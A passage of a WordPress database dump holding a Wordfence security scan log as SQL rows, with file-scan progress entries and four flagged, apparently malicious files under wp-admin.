of 369 additional files at 3.07 per second'),(4014,1630907739.000815,2,'info','Scanned contents of 373 additional files at 3.08 per second'),(4015,1630907740.255774,2,'info','Scanned contents of 377 additional files at 3.08 per second'),(4016,1630907741.386624,2,'info','Scanned contents of 380 additional files at 3.08 per second'),(4017,1630907742.412642,2,'info','Scanned contents of 384 additional files at 3.08 per second'),(4018,1630907743.505913,2,'info','Scanned contents of 389 additional files at 3.10 per second'),(4019,1630907744.566561,2,'info','Scanned contents of 394 additional files at 3.11 per second'),(4020,1630907747.279797,2,'info','Scanned contents of 397 additional files at 3.07 per second'),(4021,1630907752.714186,2,'info','Scanned contents of 398 additional files at 2.95 per second'),(4022,1630907758.935606,2,'info','Scanned contents of 402 additional files at 2.85 per second'),(4023,1630907760.198031,2,'info','Scanned contents of 406 additional files at 2.85 per second'),(4024,1630907761.367150,2,'info','Scanned contents of 410 additional files at 2.86 per second'),(4025,1630907762.496799,2,'info','Scanned contents of 414 additional files at 2.86 per second'),(4026,1630907763.661347,2,'info','Scanned contents of 419 additional files at 2.87 per second'),(4027,1630907764.661505,2,'info','Scanned contents of 421 additional files at 2.87 per second'),(4028,1630907765.771389,2,'info','Scanned contents of 425 additional files at 2.87 per second'),(4029,1630907767.114255,2,'info','Scanned contents of 430 additional files at 2.88 per second'),(4030,1630907768.320181,2,'info','Scanned contents of 434 additional files at 2.88 per second'),(4031,1630907771.702144,2,'info','Scanned contents of 435 additional files at 2.83 per second'),(4032,1630907772.818979,2,'info','Scanned contents of 440 additional files at 2.84 per second'),(4033,1630907774.554289,2,'info','Scanned contents of 442 additional files at 2.82 per second'),(4034,1630907775.859977,2,'info','Scanned contents of 443 additional files at 2.80 per second'),(4035,1630907776.991687,2,'info','Scanned contents of 446 additional files at 2.80 per second'),(4036,1630907778.324587,2,'info','Scanned contents of 450 additional files at 2.80 per second'),(4037,1630907779.384228,2,'info','Scanned contents of 453 additional files at 2.80 per second'),(4038,1630907780.398104,2,'info','Scanned contents of 456 additional files at 2.81 per second'),(4039,1630907782.841733,2,'info','Scanned contents of 460 additional files at 2.79 per second'),(4040,1630907784.535206,2,'info','Scanned contents of 461 additional files at 2.77 per second'),(4041,1630907785.539616,2,'info','Scanned contents of 464 additional files at 2.77 per second'),(4042,1630907788.709725,2,'info','Scanned contents of 466 additional files at 2.73 per second'),(4043,1630907789.943189,2,'info','Scanned contents of 471 additional files at 2.74 per second'),(4044,1630907791.145118,2,'info','Scanned contents of 474 additional files at 2.74 per second'),(4045,1630907792.370314,2,'info','Scanned contents of 478 additional files at 2.74 per second'),(4046,1630907793.908390,2,'info','Scanned contents of 483 additional files at 2.74 per second'),(4047,1630907795.140840,2,'info','Scanned contents of 487 additional files at 2.75 per second'),(4048,1630907796.704056,2,'info','Scanned contents of 490 additional files at 2.74 per second'),(4049,1630907799.889590,2,'info','Scanned contents of 492 additional files at 2.70 per second'),(4050,1630907801.169683,2,'info','Scanned contents of 497 additional files at 2.71 per second'),(4051,1630907802.318046,2,'info','Scanned contents of 500 additional files at 2.71 per second'),(4052,1630907803.331598,2,'info','Scanned contents of 504 additional files at 2.72 per second'),(4053,1630907807.373582,2,'info','Scanned contents of 507 additional files at 2.68 per second'),(4054,1630907808.390325,2,'info','Scanned contents of 512 additional files at 2.69 per second'),(4055,1630907809.482749,2,'info','Scanned contents of 516 additional files at 2.69 per second'),(4056,1630907810.648576,2,'info','Scanned contents of 521 additional files at 2.70 per second'),(4057,1630907811.671519,2,'info','Scanned contents of 525 additional files at 2.71 per second'),(4058,1630907812.683891,2,'info','Scanned contents of 529 additional files at 2.72 per second'),(4059,1630907814.335040,2,'info','Scanned contents of 533 additional files at 2.71 per second'),(4060,1630907815.422931,2,'info','Scanned contents of 538 additional files at 2.72 per second'),(4061,1630907816.447688,2,'info','Scanned contents of 542 additional files at 2.73 per second'),(4062,1630907817.478419,2,'info','Scanned contents of 547 additional files at 2.74 per second'),(4063,1630907818.609503,2,'info','Scanned contents of 552 additional files at 2.75 per second'),(4064,1630907819.619316,2,'info','Scanned contents of 555 additional files at 2.75 per second'),(4065,1630907820.800764,2,'info','Scanned contents of 559 additional files at 2.75 per second'),(4066,1630907821.892117,2,'info','Scanned contents of 563 additional files at 2.76 per second'),(4067,1630907822.961087,2,'info','Scanned contents of 568 additional files at 2.77 per second'),(4068,1630907825.604106,2,'info','Scanned contents of 569 additional files at 2.74 per second'),(4069,1630907826.628359,2,'info','Scanned contents of 573 additional files at 2.74 per second'),(4070,1630907827.747698,2,'info','Scanned contents of 578 additional files at 2.75 per second'),(4071,1630907828.753155,2,'info','Scanned contents of 582 additional files at 2.76 per second'),(4072,1630907829.775778,2,'info','Scanned contents of 585 additional files at 2.76 per second'),(4073,1630907830.815709,2,'info','Scanned contents of 588 additional files at 2.76 per second'),(4074,1630907832.052490,2,'info','Scanned contents of 592 additional files at 2.76 per second'),(4075,1630907833.166247,2,'info','Scanned contents of 595 additional files at 2.76 per second'),(4076,1630907834.330109,2,'info','Scanned contents of 598 additional files at 2.76 per second'),(4077,1630907835.609435,2,'info','Scanned contents of 601 additional files at 2.76 per second'),(4078,1630907836.890057,2,'info','Scanned contents of 605 additional files at 2.76 per second'),(4079,1630907838.154561,2,'info','Scanned contents of 610 additional files at 2.77 per second'),(4080,1630907839.281668,2,'info','Scanned contents of 613 additional files at 2.77 per second'),(4081,1630907840.478583,2,'info','Scanned contents of 617 additional files at 2.77 per second'),(4082,1630907842.749007,2,'info','Scanned contents of 619 additional files at 2.75 per second'),(4083,1630907843.837124,2,'info','Scanned contents of 623 additional files at 2.76 per second'),(4084,1630907844.956260,2,'info','Scanned contents of 628 additional files at 2.77 per second'),(4085,1630907845.965296,2,'info','Scanned contents of 633 additional files at 2.77 per second'),(4086,1630907847.011379,2,'info','Scanned contents of 637 additional files at 2.78 per second'),(4087,1630907848.067152,2,'info','Scanned contents of 641 additional files at 2.78 per second'),(4088,1630907849.180783,2,'info','Scanned contents of 645 additional files at 2.79 per second'),(4089,1630907850.220094,2,'info','Scanned contents of 649 additional files at 2.79 per second'),(4090,1630907851.368070,2,'info','Scanned contents of 658 additional files at 2.82 per second'),(4091,1630907852.569825,2,'info','Scanned contents of 664 additional files at 2.83 per second'),(4092,1630907853.609099,2,'info','Scanned contents of 669 additional files at 2.84 per second'),(4093,1630907854.721118,2,'info','Scanned contents of 673 additional files at 2.84 per second'),(4094,1630907855.928729,2,'info','Scanned contents of 678 additional files at 2.85 per second'),(4095,1630907857.152069,2,'info','Scanned contents of 682 additional files at 2.85 per second'),(4096,1630907859.434878,2,'info','Scanned contents of 687 additional files at 2.84 per second'),(4097,1630907860.637889,2,'info','Scanned contents of 691 additional files at 2.85 per second'),(4098,1630907861.739568,2,'info','Scanned contents of 695 additional files at 2.85 per second'),(4099,1630907862.841157,2,'info','Scanned contents of 700 additional files at 2.86 per second'),(4100,1630907864.018330,2,'info','Scanned contents of 704 additional files at 2.86 per second'),(4101,1630907865.084980,2,'info','Scanned contents of 708 additional files at 2.86 per second'),(4102,1630907866.102390,2,'info','Scanned contents of 712 additional files at 2.87 per second'),(4103,1630907867.236089,2,'info','Scanned contents of 717 additional files at 2.87 per second'),(4104,1630907868.397753,2,'info','Scanned contents of 722 additional files at 2.88 per second'),(4105,1630907869.452517,2,'info','Scanned contents of 726 additional files at 2.89 per second'),(4106,1630907870.472821,2,'info','Scanned contents of 730 additional files at 2.89 per second'),(4107,1630907871.511578,2,'info','Scanned contents of 734 additional files at 2.89 per second'),(4108,1630907872.634417,2,'info','Scanned contents of 738 additional files at 2.90 per second'),(4109,1630907873.866335,2,'info','Scanned contents of 744 additional files at 2.91 per second'),(4110,1630907875.495747,2,'info','Scanned contents of 745 additional files at 2.89 per second'),(4111,1630907878.075540,2,'info','Scanned contents of 746 additional files at 2.87 per second'),(4112,1630907879.178564,2,'info','Scanned contents of 750 additional files at 2.87 per second'),(4113,1630907880.372949,2,'info','Scanned contents of 754 additional files at 2.87 per second'),(4114,1630907881.398985,2,'info','Scanned contents of 758 additional files at 2.88 per second'),(4115,1630907882.532175,2,'info','Scanned contents of 763 additional files at 2.88 per second'),(4116,1630907883.705062,2,'info','Scanned contents of 769 additional files at 2.89 per second'),(4117,1630907884.886973,2,'info','Scanned contents of 774 additional files at 2.90 per second'),(4118,1630907885.923504,2,'info','Scanned contents of 778 additional files at 2.90 per second'),(4119,1630907887.176804,2,'info','Scanned contents of 783 additional files at 2.91 per second'),(4120,1630907888.185564,2,'info','Scanned contents of 787 additional files at 2.91 per second'),(4121,1630907894.208833,2,'info','Scanned contents of 790 additional files at 2.86 per second'),(4122,1630907895.349774,2,'info','Scanned contents of 793 additional files at 2.86 per second'),(4123,1630907896.614449,2,'info','Scanned contents of 796 additional files at 2.86 per second'),(4124,1630907897.731841,2,'info','Scanned contents of 800 additional files at 2.86 per second'),(4125,1630907898.761492,2,'info','Scanned contents of 804 additional files at 2.86 per second'),(4126,1630907902.581403,2,'info','Scanned contents of 807 additional files at 2.83 per second'),(4127,1630907903.684991,2,'info','Scanned contents of 810 additional files at 2.83 per second'),(4128,1630907904.906299,2,'info','Scanned contents of 813 additional files at 2.83 per second'),(4129,1630907905.948445,2,'info','Scanned contents of 816 additional files at 2.83 per second'),(4130,1630907907.321517,2,'info','Scanned contents of 820 additional files at 2.83 per second'),(4131,1630907908.607984,2,'info','Scanned contents of 824 additional files at 2.83 per second'),(4132,1630907910.828535,2,'info','Scanned contents of 826 additional files at 2.82 per second'),(4133,1630907912.008362,2,'info','Scanned contents of 830 additional files at 2.82 per second'),(4134,1630907913.013823,2,'info','Scanned contents of 833 additional files at 2.82 per second'),(4135,1630907914.305091,2,'info','Scanned contents of 838 additional files at 2.83 per second'),(4136,1630907915.414217,2,'info','Scanned contents of 841 additional files at 2.83 per second'),(4137,1630907916.425778,2,'info','Scanned contents of 844 additional files at 2.83 per second'),(4138,1630907917.594979,2,'info','Scanned contents of 849 additional files at 2.83 per second'),(4139,1630907918.727652,2,'info','Scanned contents of 852 additional files at 2.83 per second'),(4140,1630907919.910577,2,'info','Scanned contents of 856 additional files at 2.83 per second'),(4141,1630907920.953282,2,'info','Scanned contents of 859 additional files at 2.83 per second'),(4142,1630907922.010024,2,'info','Scanned contents of 864 additional files at 2.84 per second'),(4143,1630907923.069037,2,'info','Scanned contents of 872 additional files at 2.86 per second'),(4144,1630907924.203071,2,'info','Scanned contents of 877 additional files at 2.86 per second'),(4145,1630907925.377680,2,'info','Scanned contents of 883 additional files at 2.87 per second'),(4146,1630907927.530110,2,'info','Scanned contents of 885 additional files at 2.86 per second'),(4147,1630907928.582277,2,'info','Scanned contents of 889 additional files at 2.86 per second'),(4148,1630907929.696129,2,'info','Scanned contents of 894 additional files at 2.87 per second'),(4149,1630907930.842955,2,'info','Scanned contents of 898 additional files at 2.87 per second'),(4150,1630907931.917208,2,'info','Scanned contents of 903 additional files at 2.88 per second'),(4151,1630907932.938562,2,'info','Scanned contents of 907 additional files at 2.88 per second'),(4152,1630907933.948990,2,'info','Scanned contents of 911 additional files at 2.88 per second'),(4153,1630907935.282091,2,'info','Scanned contents of 915 additional files at 2.88 per second'),(4154,1630907936.335217,2,'info','Scanned contents of 919 additional files at 2.89 per second'),(4155,1630907937.442554,2,'info','Scanned contents of 923 additional files at 2.89 per second'),(4156,1630907938.639480,2,'info','Scanned contents of 927 additional files at 2.89 per second'),(4157,1630907939.762464,2,'info','Scanned contents of 931 additional files at 2.89 per second'),(4158,1630907940.768506,2,'info','Scanned contents of 934 additional files at 2.89 per second'),(4159,1630907941.821154,2,'info','Scanned contents of 937 additional files at 2.89 per second'),(4160,1630907945.009833,2,'info','Scanned contents of 939 additional files at 2.87 per second'),(4161,1630907946.152675,2,'info','Scanned contents of 942 additional files at 2.87 per second'),(4162,1630907947.404507,2,'info','Scanned contents of 947 additional files at 2.87 per second'),(4163,1630907948.595469,2,'info','Scanned contents of 952 additional files at 2.88 per second'),(4164,1630907949.728451,2,'info','Scanned contents of 956 additional files at 2.88 per second'),(4165,1630907950.854275,2,'info','Scanned contents of 960 additional files at 2.88 per second'),(4166,1630907952.092891,2,'info','Scanned contents of 964 additional files at 2.88 per second'),(4167,1630907953.370252,2,'info','Scanned contents of 968 additional files at 2.89 per second'),(4168,1630907954.509161,2,'info','Scanned contents of 972 additional files at 2.89 per second'),(4169,1630907955.513117,2,'info','Scanned contents of 976 additional files at 2.89 per second'),(4170,1630907956.611389,2,'info','Scanned contents of 980 additional files at 2.89 per second'),(4171,1630907957.990685,2,'info','Scanned contents of 984 additional files at 2.89 per second'),(4172,1630907959.192738,2,'info','Scanned contents of 989 additional files at 2.90 per second'),(4173,1630907961.362026,2,'info','Scanned contents of 993 additional files at 2.89 per second'),(4174,1630907962.495813,2,'info','Scanned contents of 996 additional files at 2.89 per second'),(4175,1630907963.562443,2,'info','Scanned contents of 999 additional files at 2.89 per second'),(4176,1630907964.848631,2,'info','Scanned contents of 1003 additional files at 2.89 per second'),(4177,1630907966.043155,2,'info','Scanned contents of 1007 additional files at 2.89 per second'),(4178,1630907967.140383,2,'info','Scanned contents of 1010 additional files at 2.89 per second'),(4179,1630907968.382391,2,'info','Scanned contents of 1013 additional files at 2.89 per second'),(4180,1630907969.939847,2,'info','Scanned contents of 1016 additional files at 2.89 per second'),(4181,1630907971.266841,2,'info','Scanned contents of 1020 additional files at 2.89 per second'),(4182,1630907972.691651,2,'info','Scanned contents of 1023 additional files at 2.88 per second'),(4183,1630907973.694051,2,'info','Scanned contents of 1025 additional files at 2.88 per second'),(4184,1630907974.915518,2,'info','Scanned contents of 1028 additional files at 2.88 per second'),(4185,1630907976.268098,2,'info','Scanned contents of 1032 additional files at 2.88 per second'),(4186,1630907981.520049,2,'info','Scanned contents of 1035 additional files at 2.85 per second'),(4187,1630907983.661689,2,'info','Scanned contents of 1036 additional files at 2.83 per second'),(4188,1630907984.891726,2,'info','Scanned contents of 1040 additional files at 2.83 per second'),(4189,1630907985.912096,2,'info','Scanned contents of 1043 additional files at 2.83 per second'),(4190,1630907987.356035,2,'info','Scanned contents of 1049 additional files at 2.84 per second'),(4191,1630907988.475059,2,'info','Scanned contents of 1056 additional files at 2.85 per second'),(4192,1630907989.807267,2,'info','Scanned contents of 1060 additional files at 2.85 per second'),(4193,1630907991.039689,2,'info','Scanned contents of 1064 additional files at 2.85 per second'),(4194,1630907992.278579,2,'info','Scanned contents of 1068 additional files at 2.85 per second'),(4195,1630907993.367011,2,'info','Scanned contents of 1073 additional files at 2.86 per second'),(4196,1630907994.530611,2,'info','Scanned contents of 1076 additional files at 2.86 per second'),(4197,1630907995.608449,2,'info','Scanned contents of 1080 additional files at 2.86 per second'),(4198,1630907997.485516,2,'info','Scanned contents of 1082 additional files at 2.85 per second'),(4199,1630907998.486394,2,'info','Scanned contents of 1085 additional files at 2.85 per second'),(4200,1630907999.839943,2,'info','Scanned contents of 1089 additional files at 2.85 per second'),(4201,1630908000.961864,2,'info','Scanned contents of 1093 additional files at 2.85 per second'),(4202,1630908003.081931,2,'info','Scanned contents of 1096 additional files at 2.84 per second'),(4203,1630908004.630659,2,'info','Scanned contents of 1097 additional files at 2.84 per second'),(4204,1630908005.796926,2,'info','Scanned contents of 1100 additional files at 2.84 per second'),(4205,1630908006.883702,2,'info','Scanned contents of 1103 additional files at 2.84 per second'),(4206,1630908007.997749,2,'info','Scanned contents of 1106 additional files at 2.83 per second'),(4207,1630908009.305464,2,'info','Scanned contents of 1110 additional files at 2.84 per second'),(4208,1630908010.547411,2,'info','Scanned contents of 1113 additional files at 2.83 per second'),(4209,1630908011.816885,2,'info','Scanned contents of 1117 additional files at 2.84 per second'),(4210,1630908012.968528,2,'info','Scanned contents of 1123 additional files at 2.84 per second'),(4211,1630908016.420953,2,'info','Scanned contents of 1124 additional files at 2.82 per second'),(4212,1630908017.784685,2,'info','Scanned contents of 1129 additional files at 2.82 per second'),(4213,1630908018.923886,2,'info','Scanned contents of 1131 additional files at 2.82 per second'),(4214,1630908019.947625,2,'info','Scanned contents of 1134 additional files at 2.82 per second'),(4215,1630908021.233813,2,'info','Scanned contents of 1138 additional files at 2.82 per second'),(4216,1630908022.250206,2,'info','Scanned contents of 1141 additional files at 2.82 per second'),(4217,1630908023.289677,2,'info','Scanned contents of 1146 additional files at 2.83 per second'),(4218,1630908024.472833,2,'info','Scanned contents of 1152 additional files at 2.83 per second'),(4219,1630908025.731839,2,'info','Scanned contents of 1156 additional files at 2.83 per second'),(4220,1630908027.721292,2,'info','Scanned contents of 1158 additional files at 2.83 per second'),(4221,1630908029.621757,2,'info','Scanned contents of 1161 additional files at 2.82 per second'),(4222,1630908030.684078,2,'info','Scanned contents of 1163 additional files at 2.82 per second'),(4223,1630908031.146876,2,'info','Scanned contents of 1165 additional files at 2.82 per second'),(4224,1630908031.183766,2,'info','Asking Wordfence to check URLs against malware list.'),(4225,1630908031.262524,2,'info','Checking 3090 host keys against Wordfence scanning servers.'),(4226,1630908032.109637,2,'info','Done host key check.'),(4227,1630908039.087522,2,'info','Done file contents scan'),(4228,1630908039.195016,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/wpimages.php'),(4229,1630908039.527755,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/cachewpcheck.php'),(4230,1630908039.768383,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(4231,1630908040.008817,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/object-cache.php'),(4237,1630908046.388389,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(4238,1630908046.521309,2,'info','Checking 261 host keys against Wordfence scanning servers.'),(4239,1630908047.441776,2,'info','Done host key check.'),(4240,1630908047.605460,2,'info','Done examining URLs'),(4245,1630908053.111417,2,'info','Starting password strength check on 1 user.'),(4252,1630908062.629854,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(4253,1630908062.727248,2,'info','Done examining URLs'),(4255,1630908064.299926,1,'info','-------------------'),(4256,1630908064.443049,2,'info','Wordfence used 30 MB of memory for scan. Server peak memory usage was: 42 MB'),(4257,1630908064.521712,1,'info','Scan Complete. Scanned 4282 files, 2 plugins, 2 themes, 43 posts, 0 comments and 3610 URLs in 27 minutes 14 seconds.'),(4260,1630923697.305904,1,'info','Initiating quick scan'),(4265,1630923697.537241,1,'info','-------------------'),(4266,1630923697.558664,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(4267,1630923697.569261,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4270,1631010430.317190,1,'info','Initiating quick scan'),(4275,1631010430.541321,1,'info','-------------------'),(4276,1631010430.550771,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(4277,1631010430.553304,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4280,1631096527.846175,1,'info','Initiating quick scan'),(4285,1631096528.642410,1,'info','-------------------'),(4286,1631096528.683431,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 8 MB'),(4287,1631096528.699945,1,'info','Quick Scan Complete. Scanned in 1 second.'),(4289,1631165408.910347,1,'info','Scheduled Wordfence scan starting at Thursday 9th of September 2021 05:30:08 AM'),(4291,1631165410.177900,1,'info','Contacting Wordfence to initiate scan'),(4298,1631165417.994442,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(4299,1631165418.005710,2,'info','The disk has 3458311.95 MB available'),(4307,1631165418.329132,2,'info','Getting plugin list from WordPress'),(4308,1631165418.487719,2,'info','Found 2 plugins'),(4309,1631165418.499170,2,'info','Getting theme list from WordPress'),(4310,1631165418.603270,2,'info','Found 2 themes'),(4313,1631165421.371507,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(4314,1631165421.387913,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(4315,1631165421.421912,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(4316,1631165421.431085,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(4317,1631165421.468896,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(4318,1631165421.499280,10,'info','SUM_DISABLED:Skipping theme scan'),(4319,1631165421.511349,10,'info','SUM_DISABLED:Skipping plugin scan'),(4320,1631165421.552094,10,'info','SUM_START:Scanning for known malware files'),(4321,1631165421.705899,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(4322,1631165422.129939,2,'info','500 files indexed'),(4323,1631165422.453579,2,'info','1000 files indexed'),(4324,1631165423.711986,2,'info','1500 files indexed'),(4325,1631165424.332171,2,'info','2000 files indexed'),(4326,1631165424.579745,2,'info','2500 files indexed'),(4327,1631165424.937657,2,'info','3000 files indexed'),(4328,1631165425.273837,2,'info','3500 files indexed'),(4329,1631165425.572659,2,'info','4000 files indexed'),(4330,1631165425.729589,2,'info','4282 files indexed'),(4331,1631165431.528629,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(4332,1631165437.556076,2,'info','Analyzed 200 files containing 2.94 MB of data so far'),(4333,1631165444.665206,2,'info','Analyzed 300 files containing 4.45 MB of data so far'),(4334,1631165453.698495,2,'info','Analyzed 400 files containing 7.23 MB of data so far'),(4335,1631165459.669912,2,'info','Analyzed 500 files containing 8.29 MB of data so far'),(4336,1631165465.047128,2,'info','Analyzed 600 files containing 8.98 MB of data so far'),(4337,1631165472.731085,2,'info','Analyzed 700 files containing 9.95 MB of data so far'),(4338,1631165478.473174,2,'info','Analyzed 800 files containing 11.69 MB of data so far'),(4339,1631165488.264096,2,'info','Analyzed 900 files containing 17.09 MB of data so far'),(4340,1631165496.054082,2,'info','Analyzed 1000 files containing 18.71 MB of data so far'),(4341,1631165505.367390,2,'info','Analyzed 1100 files containing 19.88 MB of data so far'),(4342,1631165510.490161,2,'info','Analyzed 1200 files containing 20.61 MB of data so far'),(4343,1631165514.811441,2,'info','Analyzed 1300 files containing 21.56 MB of data so far'),(4344,1631165522.791704,2,'info','Analyzed 1400 files containing 21.6 MB of data so far'),(4345,1631165532.637134,2,'info','Analyzed 1500 files containing 21.63 MB of data so far'),(4346,1631165539.050795,2,'info','Analyzed 1600 files containing 23.04 MB of data so far'),(4347,1631165544.636096,2,'info','Analyzed 1700 files containing 24.9 MB of data so far'),(4348,1631165551.756478,2,'info','Analyzed 1800 files containing 26.59 MB of data so far'),(4349,1631165561.842496,2,'info','Analyzed 1900 files containing 29.89 MB of data so far'),(4350,1631165566.303661,2,'info','Analyzed 2000 files containing 30.56 MB of data so far'),(4351,1631165570.597780,2,'info','Analyzed 2100 files containing 32.17 MB of data so far'),(4352,1631165576.330587,2,'info','Analyzed 2200 files containing 35.22 MB of data so far'),(4353,1631165583.019900,2,'info','Analyzed 2300 files containing 36.8 MB of data so far'),(4354,1631165589.849849,2,'info','Analyzed 2400 files containing 38.42 MB of data so far'),(4355,1631165597.142193,2,'info','Analyzed 2500 files containing 49.74 MB of data so far'),(4356,1631165603.310784,2,'info','Analyzed 2600 files containing 52.62 MB of data so far'),(4357,1631165609.750736,2,'info','Analyzed 2700 files containing 54.94 MB of data so far'),(4358,1631165616.034710,2,'info','Analyzed 2800 files containing 57.68 MB of data so far'),(4359,1631165623.063959,2,'info','Analyzed 2900 files containing 60.78 MB of data so far'),(4360,1631165632.698047,2,'info','Analyzed 3000 files containing 61.94 MB of data so far'),(4361,1631165640.080288,2,'info','Analyzed 3100 files containing 64.26 MB of data so far'),(4362,1631165647.707498,2,'info','Analyzed 3200 files containing 64.95 MB of data so far'),(4363,1631165657.878212,2,'info','Analyzed 3300 files containing 66.2 MB of data so far'),(4364,1631165669.533925,2,'info','Analyzed 3400 files containing 68.43 MB of data so far'),(4365,1631165680.289522,2,'info','Analyzed 3500 files containing 70.24 MB of data so far'),(4366,1631165688.526354,2,'info','Analyzed 3600 files containing 71.33 MB of data so far'),(4367,1631165698.919093,2,'info','Analyzed 3700 files containing 82.99 MB of data so far'),(4368,1631165706.796628,2,'info','Analyzed 3800 files containing 86.79 MB of data so far'),(4369,1631165716.694151,2,'info','Analyzed 3900 files containing 88.74 MB of data so far'),(4370,1631165723.754709,2,'info','Analyzed 4000 files containing 91.84 MB of data so far'),(4371,1631165737.244533,2,'info','Analyzed 4100 files containing 94.75 MB of data so far'),(4372,1631165744.554796,2,'info','Analyzed 4200 files containing 95.92 MB of data so far'),(4373,1631165755.650258,2,'info','Analyzed 4282 files containing 97.41 MB of data.'),(4374,1631165755.672927,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(4375,1631165755.713270,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(4376,1631165755.753486,10,'info','SUM_ENDOK:Scanning for known malware files'),(4377,1631165755.855024,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(4378,1631165755.927194,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(4379,1631165755.992853,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(4380,1631165756.014306,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(4381,1631165758.309466,2,'info','Starting scan of file contents'),(4382,1631165759.533546,2,'info','Scanned contents of 10 additional files at 8.60 per second'),(4383,1631165760.536553,2,'info','Scanned contents of 19 additional files at 8.77 per second'),(4384,1631165761.698640,2,'info','Scanned contents of 31 additional files at 9.32 per second'),(4385,1631165762.706110,2,'info','Scanned contents of 44 additional files at 10.15 per second'),(4386,1631165763.723891,2,'info','Scanned contents of 61 additional files at 11.40 per second'),(4387,1631165764.748812,2,'info','Scanned contents of 77 additional files at 12.07 per second'),(4388,1631165765.817720,2,'info','Scanned contents of 93 additional files at 12.49 per second'),(4389,1631165766.819784,2,'info','Scanned contents of 106 additional files at 12.55 per second'),(4390,1631165767.862406,2,'info','Scanned contents of 115 additional files at 12.12 per second'),(4391,1631165768.879746,2,'info','Scanned contents of 130 additional files at 12.37 per second'),(4392,1631165769.922706,2,'info','Scanned contents of 153 additional files at 13.24 per second'),(4393,1631165771.170823,2,'info','Scanned contents of 163 additional files at 12.73 per second'),(4394,1631165772.365076,2,'info','Scanned contents of 164 additional files at 11.72 per second'),(4395,1631165773.365392,2,'info','Scanned contents of 177 additional files at 11.80 per second'),(4396,1631165774.379269,2,'info','Scanned contents of 188 additional files at 11.74 per second'),(4397,1631165775.586888,2,'info','Scanned contents of 205 additional files at 11.91 per second'),(4398,1631165776.632727,2,'info','Scanned contents of 208 additional files at 11.39 per second'),(4399,1631165777.654638,2,'info','Scanned contents of 227 additional files at 11.77 per second'),(4400,1631165778.736204,2,'info','Scanned contents of 248 additional files at 12.18 per second'),(4401,1631165779.757434,2,'info','Scanned contents of 264 additional files at 12.34 per second'),(4402,1631165780.790533,2,'info','Scanned contents of 278 additional files at 12.40 per second'),(4403,1631165781.809788,2,'info','Scanned contents of 299 additional files at 12.76 per second'),(4404,1631165782.834479,2,'info','Scanned contents of 321 additional files at 13.12 per second'),(4405,1631165783.934623,2,'info','Scanned contents of 327 additional files at 12.79 per second'),(4406,1631165784.984403,2,'info','Scanned contents of 348 additional files at 13.08 per second'),(4407,1631165786.101507,2,'info','Scanned contents of 371 additional files at 13.38 per second'),(4408,1631165787.130076,2,'info','Scanned contents of 386 additional files at 13.42 per second'),(4409,1631165788.138192,2,'info','Scanned contents of 407 additional files at 13.67 per second'),(4410,1631165789.156275,2,'info','Scanned contents of 429 additional files at 13.94 per second'),(4411,1631165790.163155,2,'info','Scanned contents of 448 additional files at 14.09 per second'),(4412,1631165791.211487,2,'info','Scanned contents of 459 additional files at 13.98 per second'),(4413,1631165792.502742,2,'info','Scanned contents of 466 additional files at 13.65 per second'),(4414,1631165793.511367,2,'info','Scanned contents of 487 additional files at 13.86 per second'),(4415,1631165794.534232,2,'info','Scanned contents of 503 additional files at 13.91 per second'),(4416,1631165795.558854,2,'info','Scanned contents of 527 additional files at 14.17 per second'),(4417,1631165796.591491,2,'info','Scanned contents of 544 additional files at 14.23 per second'),(4418,1631165797.630384,2,'info','Scanned contents of 563 additional files at 14.34 per second'),(4419,1631165798.631607,2,'info','Scanned contents of 586 additional files at 14.56 per second'),(4420,1631165799.858149,2,'info','Scanned contents of 591 additional files at 14.25 per second'),(4421,1631165800.885640,2,'info','Scanned contents of 602 additional files at 14.16 per second'),(4422,1631165801.938003,2,'info','Scanned contents of 615 additional files at 14.12 per second'),(4423,1631165803.001102,2,'info','Scanned contents of 630 additional files at 14.12 per second'),(4424,1631165804.027669,2,'info','Scanned contents of 653 additional files at 14.30 per second'),(4425,1631165805.039622,2,'info','Scanned contents of 675 additional files at 14.46 per second'),(4426,1631165806.064629,2,'info','Scanned contents of 693 additional files at 14.53 per second'),(4427,1631165807.100137,2,'info','Scanned contents of 713 additional files at 14.63 per second'),(4428,1631165808.100194,2,'info','Scanned contents of 729 additional files at 14.66 per second'),(4429,1631165809.112944,2,'info','Scanned contents of 751 additional files at 14.80 per second'),(4430,1631165810.142410,2,'info','Scanned contents of 775 additional files at 14.97 per second'),(4431,1631165811.500419,2,'info','Scanned contents of 788 additional files at 14.83 per second'),(4432,1631165813.333020,2,'info','Scanned contents of 807 additional files at 14.68 per second'),(4433,1631165814.333415,2,'info','Scanned contents of 823 additional files at 14.71 per second'),(4434,1631165815.690580,2,'info','Scanned contents of 838 additional files at 14.62 per second'),(4435,1631165816.718654,2,'info','Scanned contents of 852 additional files at 14.60 per second'),(4436,1631165817.749476,2,'info','Scanned contents of 874 additional files at 14.72 per second'),(4437,1631165818.756926,2,'info','Scanned contents of 893 additional files at 14.79 per second'),(4438,1631165820.193191,2,'info','Scanned contents of 907 additional files at 14.67 per second'),(4439,1631165822.034445,2,'info','Scanned contents of 923 additional files at 14.50 per second'),(4440,1631165823.047155,2,'info','Scanned contents of 925 additional files at 14.30 per 